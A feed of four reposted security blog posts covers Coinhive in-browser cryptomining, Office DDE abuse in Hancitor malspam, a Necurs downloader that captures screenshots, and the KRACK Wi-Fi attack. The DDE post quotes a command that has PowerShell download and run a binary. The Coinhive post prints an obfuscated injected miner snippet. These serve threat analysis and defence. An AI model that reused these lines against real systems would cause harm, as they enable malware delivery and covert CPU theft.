Overall, we have seen over 35,119 unique URLs associated with coinhive.min.js. Across these URLs, there are a total of 144 IPs and 1,025 hostnames. Based on our observation, the appearance of these scripts can be clearly divided into three categories – standalone, voluntary, and compromised.

Standalone Hosting

URLs like this one,


always belong to a jibberish[.]bid domain, with a long trailing set of parameters. Of the 35,119 URLs we collected, 33,188, or 94.5% are of this category. In addition, there are 612 URLs leading to the same set of .bid domains, but with much shorter URLs, like hxxp://www.pudptxanhspld[.]bid/static/robots.txt, or even the domain itself: hxxp://www.pudptxanhspld[.]bid/. The fact that robots.txt is hosting the exact same content as any other longer URLs with seemingly random parameters leads us to speculate that the domain will serve the same coin-mining content to all visitors, ignoring the request parameters or paths. It is interesting to speculate, why did our customer visit such weird, long, random URLs in the first place? We give some of our speculations later in this blog.

After removing the .bid ones, we are left with 1,342 URLs, or 3.8% of the corpus. The remaining can be further categorized into the following three groups:

Voluntary: Crypto-mining related sites

We found multiple URLs related to coin/crypto/mining keywords. Some of these are forums discussing crypto-mining, while others are introducing the concept. Regardless of the purpose of the websites, we did not find any evidence that such sites are asking user’s consent to mine XMRs.

Voluntary: Monetization

This category includes sites that obviously want to include coin-mining scripts to monetize. Examples of these include video/porn sites such as


While they do provide their normal service to the visitors, browsing these sites do not pop up any sort of warning of coin-mining behavior for the user.

What is more interesting is, that by searching across the whole URL corpus for coinhive.min.js downloads, we are able to find URLs such as


which includes xmoviesforyou[.]com as part of the URL, almost like a referer parameter. We are able to verify that


is indeed a valid URL leading to a subpage in the porn site. That site does include coinhive.min.js, but at the time of our re-confirmation, the inclusion is directly from https://coinhive[.]com/lib/coinhive.min[.]js, and the whole page does not include any references to a suspicious .bid domain/URL. We speculate that the porn website URL may have included an iframe leading to the .bid domain, which then triggers the download of coinhive.min.js. However, this mechanism may have been later abandoned in favor of direct inclusion.

Compromised/Injected Integration

Another group of sites seem to have fallen victims of malicious script injection into their vulnerable servers. We found that www.livetruemoney[.]com uses up 100% of user’s CPU time. Upon closer investigation, we found that this site is hosting multiple copies of coinhive.min.js, toward the top and bottom of the page. Similar situation happens in www.comptesofficiels[.]com/, where the snippet is injected outside oftag (a common symptom for injected content).

It is quite possible that crypto-mining has become a new injection vector in addition to traditional exploit kits redirections.

Finally, we have also seen some typo-squatting/phishing domains serving coinhive.min.js. Examples include analytics-google[.]net/track.php, and www-bank[.]ru.

Actor/Mining Configuration Analysis

According to our observation, coin mining integration scripts are rarely obfuscated, which means we can extract the anonymous ‘site key’ and their configurations easily. Per Coinhive’s documentation, the ‘site key’ is a unique identifier to indicate which beneficiary will be paid, therefore, the attacker has no incentive to garble this field. Here are some interesting stats about the actors and their configurations.

Actor distribution


There is a clear winner at the top – ID t3z562mp2zg1lia7rujy19d67woezmjj claiming 35,742 over 36,842 of all the IDs we were able to retrieve. Surprisingly, querying a website source code search engine like publicWWW only returns 13 results (mostly .bid domains). The remote second and third scored 370 and 119 occurrences respectively, along with 8 other IDs topping 10 occurrences. A long tail (146) of IDs only have 1 appearance in our dataset, and these are possibly category 2 or 3 in our integration scenarios described above – mining would benefit themselves rather than a campaign owner.

With no surprise, site key owner t3z562mp2zg1lia7rujy19d67woezmjj has all the .bid URLs pointing to this payee. In addition, there are URLs such as


also using the same site key. Passive DNS analysis reveals that this IP actually was mapped to serve.popads[.]net, so it is interesting that this particular advertising network may have led to crypto-mining behavior.

In this chart, a special case sitekey stands out. There are 151 sites using it, and it is a predefined variable in previous scripts (as opposed to hardcoded string) so without dynamic analysis we are not able to retrieve its real content. We took a look at a few samples and it seems that sites using the sitekey variable are more often than not serving mining script to benefit themselves.

We found only six out of the entire URL population making more than one call to coinhive.Anonymous function (which means they could possibly be compromised by two different adversaries/serving two different payees at the same time). Upon closer inspection, all the calls actually have the same site key, so in summary we did not find evidence of one site serving more than one beneficiary. We did, however, find out that one site, lottoipros[.]com, is attempting to obfuscate its site key by using simple Unicode encoding:

var _0x8cfd=["x56x63x33x38x75x32x33x35x51x67x31x55x6Ex48x78x47x43x52x6Ax59x51x4Dx58x70x6Ex4Ax73x58x77x4Bx4Cx69","x73x74x61x72x74"];var miner=new CoinHive.Anonymous(_0x8cfd[0],{threads:1,autoThreads:true,throttle:0.6,forceASMJS:false})

Clearly, the site owner/injector is aware of the risks of exposing its key and is trying to hide from public scrutiny. If this trend continues, it will become harder to use static analysis to detect crypto-mining sites.

Configuration Distribution

The dominant Actor ID t3z562mp2zg1lia7rujy19d67woezmjj uses default configuration across all of observed URLs, so we exclude this actor from this analysis to prevent skew. We also exclude the 142 sites that use mineropts that go almost hand-in-hand with sites using sitekey as their site key.

This left us with 827 valid data points. Among these, most sites only use 1 thread, by default; however, some sites use as many as 4 threads to maximize mining speed.

Thread count Number of sites
default (1) 772
1 28
2 7
3 1
4 19

For throttling, other than the default setting which disables throttling, the most popular option is to set it at 0.5, so that the CPU would idle 50% of the time. It is sufficient to say that most sites are not giving user’s CPU any break at all by disabling throttling.

Throttle setting Number of sites
default (0) 772
0.5 28
0.2 25
0.7 19
0.9 10
other values combined 35

Hosting domain analysis

In this section, we show some hosting domain stats, including PassiveDNS and Whois data analysis.

The TLD distribution for domains hosting coinhive.min.js is shown below. For brevity, we aggregated all TLDs having less than 20 entries into others category.


Clearly, the top suspects are .download and .bid domains, taking more than 35% of the total share of 1,025 domains. As expected, typically notorious TLDs like .xyz and .win is also listed.

Alexa rank distribution

We checked all associated domains against the current Alexa traffic ranking. The results are astonishing – there are 5 sites in top 2K, 29 sites in top 10K and 155 sites in top 1 million. We sample a few highest-ranking sites and show it here:

Site Alexa Rank
uptobox[.]com 771
123movies[.]co 963
cinecalidad[.]to 1026
watchfree[.]to 1892
sugklonistiko[.]gr 1910

At the time of the writing, we can no longer observe coinhive.min.js on their sites.

The highest ranked .bid domain, llxyyocfgfg[.]bid is ranked at 3380 at the time of this writing. We have attached all these IOCs and their rankings at the end of this blog for the community’s benefits.

pDNS analysis

We looked up these domains in our passive DNS (pDNS) database. 794 domains were found with records among the 1026 domains in total. We found that the first DNS query to many domains dates back to the launch date of our pDNS in 2013, such as uptobox[.]com, torrent[.]cd, and tiexue[.]net. This means these websites have been active for a long time. Some of them are quite popular based on their Alexa ranking. So, the potential impact of Coinhive can be high in both time and space. We also found that the first DNS query to 502 (63%) domains happened in October 2017. Based on the figure below, we can clearly see the emerging trend of these domains.


We further investigated the DNS query pattern of these domains. In particular, the following graph shows the number of DNS queries to these website per hour. Interestingly, we found that some domains exhibit very similar patterns. Although the start time and amount of traffic are slightly different, the overall pattern of traffic is very much similar in shape. This is another indicator that these domains potentially belong to the same campaign launched by the same owner.


In addition, we analyzed the distribution of IPs to which these domains were resolved. We identified 1,172 IPs in total, located in 47 different countries with the majority being in US. Below is the figure showing the country-level distribution of these IPs.


Whois analysis

Through querying public Whois server as well as Domaintools, we obtained 861 valid whois records of 1,025 domains. We break the results down by registrant/emails and their registration dates.

  • Registrant/Emails: Not much can be learned due to the fact that most (521) are privacy protected by WhoisGuard. In the remaining registrants, there are also fake ones such as Administrator and Private Person. After removing the useless entries, we are only left with 80 different registrants, with no more than one registrant appearing more than 3 times. All the .bid domains are privacy protected. Since WhoisGuard service is not free (around $3/year), the .bid campaign actors are probably earning enough profit to offset this cost.
  • Registration date: To better present details in registration date, we separate domains with different TLDs:


For .bid domains that we are able to retrieve whois information, most are registered after 10/01/2017 but spanning across multiple days, showing that the campaign is very recent and it has a rotating number of domains refreshing every day.


On the contrary, most .download domains were registered within 3 days of 09/14-09/16, 2017, with only a handful added on later. This looks to be a different campaign than the .bid ones. Similar registration trend can be found on .review domains (87 out of 103 are registered on the 3rd, 7th, and 8th of October 2017).


Finally, after we exclude the suspected campaign domains (.bid, .download, .review, .top, .win), the registration dates are extremely spread out from as early as 2001 to the current date. These domains are most likely either embracing the new crypto-mining monetization fever, or compromised by attackers to take advantage of their established reputation and high-volume visitors.

Victim analysis

The URLs we crawled to detect crypto-miner presence comes from our PANDB cloud log. In this section, we analyze the demographics of visitors to such sites to shed some insights on their real-world impact.


This figure shows the general geographic distribution of visitors to crypto-mining sites. While the US clearly dominates in total visiting counts, Europe and Asia Pacific is not too far behind. This graph indicates a broad spectrum of victims all across the globe.

After breaking down visits site-by-site, we found that the most visited sites more or less align with their Alexa ranking, with over 40K visits* to the 123moviews[.]co:


We only log a query when customer(s) using the same device visits the site for the first time in a TTL window. This does not count duplicate visits to the same site within a short timeframe. Therefore, the visits estimations are a lower bound.


As AdGuard has pointed out, the use of coinhive or similar mining services is itself not a malicious activity, it is how they are used that makes the sites malicious. Unfortunately, for the sites that we were able to observe engaging in crypto-mining activities, none of them has prompted the user with any sort of warning, let alone providing the kill switch for mining. With Bitcoin soaring over $5K (at time of writing), we can only expect more of such services spawning from everywhere. To protect yourself from this fast-growing threat, we recommend two options:

  • Palo Alto Networks is blocking URLs hosting the Coinhive JavaScript files through PANDB, as these scripts are consuming system resources without the users’ knowledge or consent.
  • In addition, popular browser plugins such as Adblock plus or Adguard will also block such mining scripts. Combine it with our firewall solution, you can rest assured that your previous CPU time and electricity is not exploited by sneaky scripts.
  • Users interested in Domains hosting Coinhive script files included in this analysis can access them here.

The post Unauthorized Coin Mining in the Browser appeared first on Palo Alto Networks Blog.

Go to Source
Author: Yuchen Zhou

Powered by WPeMatico

Old MS Office feature weaponized in malspam attacks

There has been a lot of talks recently following a write up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

First, the DDE was used in some targeted attacks. However, now it has become mainstream with the group behind Hancitor (spotted by @James_inthe_box and DDE identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\Windows\System32\cmd.exe " /k powershell.exe (New-Object System.Net.
'%TEMP%\tvs.exe');Start-Process '%TEMP%\tvs.exe'"

The rest of the attack is straight forward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Necurs attackers now want to see your desktop

Recently we have seen a resurgence of emails sent by the Necurs botnet. The latest blast of emails is spreading a new variant of the Locky ransomware (Ransom.Locky) or Trickybot (Trojan.Trickybot). What’s interesting about this new wave is that the downloader now contains new functionality to gather telemetry from victims. It can take screen grabs and send them back to a remote server. There’s also an error-reporting capability that will send back details of any errors that the downloader encounters when it tries to carry out its activities.

Beware of strangers offering fake invoices

The new emails use a tried-and-tested invoice-based social engineering format, and generally contain the following details:

Subject: Status of invoice [FAKE INVOICE NUMBER]

Attachment:  [FAKE INVOICE NUMBER].html

The body of the email contains a message urging the reader to open the attachment to check the invoice.

Standard precautions apply here; when strangers offer you unsolicited invoices or deliveries via email, the safest course of action is to simply trash the email.

An example of Necurs spam email

Figure 1. Typical invoice email sent by Necurs botnet

If the attached .html file is opened, it will download a JavaScript via an embedded iframe. The JavaScript will download the payload which will either be Locky or Trickybot.

Attackers need operational intelligence too

Besides the standard download and execute final payload functionality, the downloader also runs a PowerShell script that takes a screen grab and saves it to a file named generalpd.jpg.

It then waits a few seconds for the Save operation to complete and then starts off a command to upload the saved .jpg to a remote server.

PowerShell script used by Necurs

Figure 2. PowerShell script that captures a screenshot and then uploads it

This functionality is interesting because downloaders tend to just deliver a payload and then disappear as quickly as possible. When you consider the screen grab functionality together with the new error-reporting capability, it suggests that the Necurs attackers are actively trying to gather operational intelligence (OPINTEL) about the performance of their campaigns. Much like crash reports in OSes can help software companies fix issues and build better products, these error reports can help attackers spot problems in the field and address them to improve success rates. After all, you can’t count on the victims to report back errors and issues!

Attackers need operational intelligence too. #Necurs downloader now also collecting OPINTEL.CLICK TO TWEET

Necurs: back with a vengeance

Necurs went through a long spell of silence from end of 2016 and into early 2017. It burst back onto the scene around March and since then, it has been cranking up its activity levels, with recent months seeing the most action so far in 2017.

Figure 3. Symantec telemetry shows Necurs emails with script attachments have grown fourfold since June

Figure 3. Symantec telemetry shows Necurs emails with script attachments have grown fourfold since June

With our data showing a resurgence in activity, and the apparent efforts to collect operational intelligence, we can expect to see continued evolution of the capabilities and a steady increase in Necurs activity levels in the coming months.

Whatever the attackers choose to do, our analysts will be keeping a close eye on developments as the campaigns continue to evolve.


Symantec recommends users follow these best practices to stay protected from ransomware and other threats:

  • Delete any suspicious-looking emails you receive, especially if they contain links or attachments.
  • Always keep your security software up to date to protect yourself against any new variants of malware.
  • Keep your operating system and other software updated. Software updates will frequently include patches for newly discovered security vulnerabilities that could be exploited by attackers.
  • Regularly back up any files stored on your computer. If your computer does become infected with ransomware, your files can be restored once the malware has been removed.

Go to Source
Author: Symantec Security Response

KRACK: Your Wi-Fi is no longer secure

Most vulnerabilities go unnoticed by the majority of the world’s population even if they affect several million people. But this news, published today, is probably even bigger then the recently disclosed Yahoo breach and affects several billion people all over the world: Researchers have found a bunch of vulnerabilities that make all Wi-Fi networks insecure.

A paper published today describes how virtually any Wi-Fi network that relies on WPA or WPA2 encryption can be compromised. And with WPA being the standard for modern Wi-Fi, that means pretty much every Wi-Fi network in the world is vulnerable.

The research is quite complicated, so we won’t go through it in detail and will just briefly highlight the main findings.

How KRACK works

Researchers have found out that devices based on Android, iOS, Linux, macOS, Windows, and some other operating systems are vulnerable to some variation of this attack, and that means almost any device can be compromised. They called this type of attack a key reinstallation attack, or KRACK for short.

In particular, they describe how an attack on Android 6 devices works. To execute it, the attacker has to set up a Wi-Fi network with the same name (SSID) as that of an existing network and target a specific user. When the attacker detects that the user is about to connect to the original network, they can send special packets that make the device switch to another channel and connect to the fake network with the same name.

After that, using a flaw in the implementation of the encryption protocols they can change the encryption key the user was using to a string of zeroes and thus access all of the information that the user uploads or downloads.

One may argue that there’s another layer of security — the encrypted connection to a site, e.g., SSL or HTTPS. However, a simple utility called SSLstrip set up on the fake access point is enough to force the browser to communicate with unencrypted, HTTP versions of websites instead of encrypted, HTTPS versions, in cases where encryption is not correctly implemented on a site (and that is true for quite a lot of websites, including some very big ones).

So, by using this utility in their fake network, the attacker can access the users’ logins and passwords in plain text, which basically means stealing them.


What can you do to secure your data?

The fact that almost every device in almost every Wi-Fi network is vulnerable to KRACK sounds quite scary, but — like pretty much any other type of attack — this one is not the end of the world. Here are a couple of tips on how to stay safe from KRACK attacks in case anyone decides to use them against you.

  • Always check to make sure there’s a green lock icon in the address bar of your browser. That lock indicates that an HTTPS (encrypted and therefore secure) connection to this particular website is being used. If someone attempts to use SSLstrip against you, the browser will be forced to use HTTP versions of websites, and the lock will disappear. If the lock is in place, your connection is still secure.
  • The researchers warned some network appliance manufacturers (including the Wi-Fi Alliance, which is responsible for standardizing the protocols) in advance of releasing their paper, so most of them have to be in the process of issuing firmware updates that can fix the issue with key reinstallation. So check if there are fresh firmware updates for your devices and install them as soon as possible.
  • You can secure your connection using a VPN, which adds another layer of encryption to the data transferred from your device. You can read more on what a VPN is and how to choose one, or grab Kaspersky Secure Connection right away.

Go to Source
Author: Alex Perekalin